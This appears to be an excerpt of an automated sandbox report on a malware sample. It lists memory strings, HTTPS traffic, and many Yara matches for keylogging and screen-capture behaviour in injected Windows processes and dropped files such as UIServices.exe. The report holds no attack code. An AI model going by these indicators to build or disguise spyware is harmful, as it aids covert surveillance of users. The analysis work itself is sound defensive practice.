                        Source: SearchApp.exe, 0000000A.00000000.1797436864.0000024340BDE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/dhp_l
                        Source: SearchApp.exe, 0000000A.00000000.1797436864.0000024340BDE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/mmx0
                        Source: SearchApp.exe, 0000000A.00000000.1797436864.0000024340BDE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ntphttps://www.msn.com/spartan/ntpX
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                        Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
                        Source: svchost.exe, 00000003.00000002.2956326778.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
                        Source: svchost.exe, 00000003.00000002.2956326778.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownHTTPS traffic detected: 212.224.93.93:443 -> 192.168.2.4:49740 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 212.224.93.93:443 -> 192.168.2.4:49739 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.217.16.196:443 -> 192.168.2.4:49879 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED
                        Source: Yara matchFile source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.3.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.3.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.3.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.0.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.0.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.0.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.3.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.0.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.3.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.0.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.3.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 28.3.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.0.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.svchost.exe.910000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.3.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.3.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.3.explorer.exe.c350000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.0.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.0.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.0.SearchApp.exe.a90000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.0.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.0.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.3.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.3.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.0.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.0.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.3.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.0.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.3.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.0.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.3.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.3.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.3.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 28.0.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.0.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.services.png.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.3.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.0.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.services.png.exe.2810000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.0.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.explorer.exe.c350000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.0.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.3.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.0.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.0.SearchApp.exe.a90000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.3.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.3.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.services.png.exe.2810000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.3.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.0.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.3.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.0.conhost.exe.30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.0.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 28.0.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.3.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.0.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.3.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.3.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.svchost.exe.910000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 28.3.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.0.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.0.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.3.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.0.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.3.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.3.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.3.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.0.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.0.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.0.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.0.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.3.nyheukpo.exe.40fb2d4.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.3.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.3.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.0.svchost.exe.d40000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.3.conhost.exe.30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.3.svchost.exe.d40000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.3.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000000.2102061957.0000000002990000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000029.00000002.2973195709.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000000.2106925891.0000000002E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000000.2109775705.0000000002530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000028.00000002.2974532793.0000000002390000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000000.2113078053.0000000002E50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000000.2129746271.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000000.2127013709.0000000002F50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000000.2085005947.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000000.2075479994.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000003.1790120113.0000000000110000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000000.1766360463.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000002.2973995755.0000000002530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.2066606336.0000000000010000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000000.2096580735.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000000.2120619904.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000002.2964235219.0000000002E50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.2966547595.00000000025D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000003.2032162611.0000000000190000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.2029881834.0000000000190000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000000.2032466719.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000003.1955044832.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000000.1792075779.0000000000A90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000003.2070787045.0000000000010000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000002.2968177291.0000000002990000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000000.2070992540.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000000.1941072289.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000029.00000000.2141291646.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001C.00000003.2096406602.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.2968884434.0000000002F50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000003.2084799594.0000000000030000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000000.1786038916.0000000000110000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000002.2961588503.0000000002400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
